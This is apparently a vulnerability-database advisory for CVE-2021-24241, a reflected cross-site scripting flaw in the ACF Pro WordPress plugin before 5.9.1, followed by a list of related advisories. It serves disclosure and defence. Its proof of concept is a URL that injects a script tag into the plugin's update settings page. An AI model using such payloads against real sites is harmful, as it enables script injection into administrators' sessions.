Advanced Custom Field Pro < 5.9.1 – Authenticated Reflected Cross-Site Scripting (XSS) | CVE 2021-24241

Description

The plugin did not properly escape the generated update URL when outputting it in an attribute, leading to a reflected Cross-Site Scripting issue in the update settings page.

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>

Affects Plugins

advanced-custom-fields-pro

Fixed in 5.9.1

References

CVE

CVE-2021-24241

URL

https://github.com/jdordonezn/Reflected-XSS-in-WordPress-for-ACF-PRO-before-5.9.1-plugin/issues/1

URL

https://www.advancedcustomfields.com/blog/acf-5-9-1-release/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

7.1 (high)

Miscellaneous

Original Researcher

Juan David Ordoñez Noriega

Submitter

Juan David Ordoñez Noriega

Verified

Yes

WPVDB ID

d1e9c995-37bd-4952-b88e-945e02e3c83f

Timeline

Publicly Published

2021-01-20 (about 4 years ago)

Added

2021-04-02 (about 4 years ago)

Last Updated

2021-06-09 (about 4 years ago)

Other

Published

Title

Published

2025-05-07

Title

Published

2025-09-22

Title

VikRestaurants Table Reservations and Take-Away < 1.5.1 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-03-28

Title

GS Testimonial Slider < 3.1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-08

Title

Beacon For Help Scout <= 1.3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-03

Title

Paytm Payment Donation <= 2.3.3 - Admin+ Stored XSS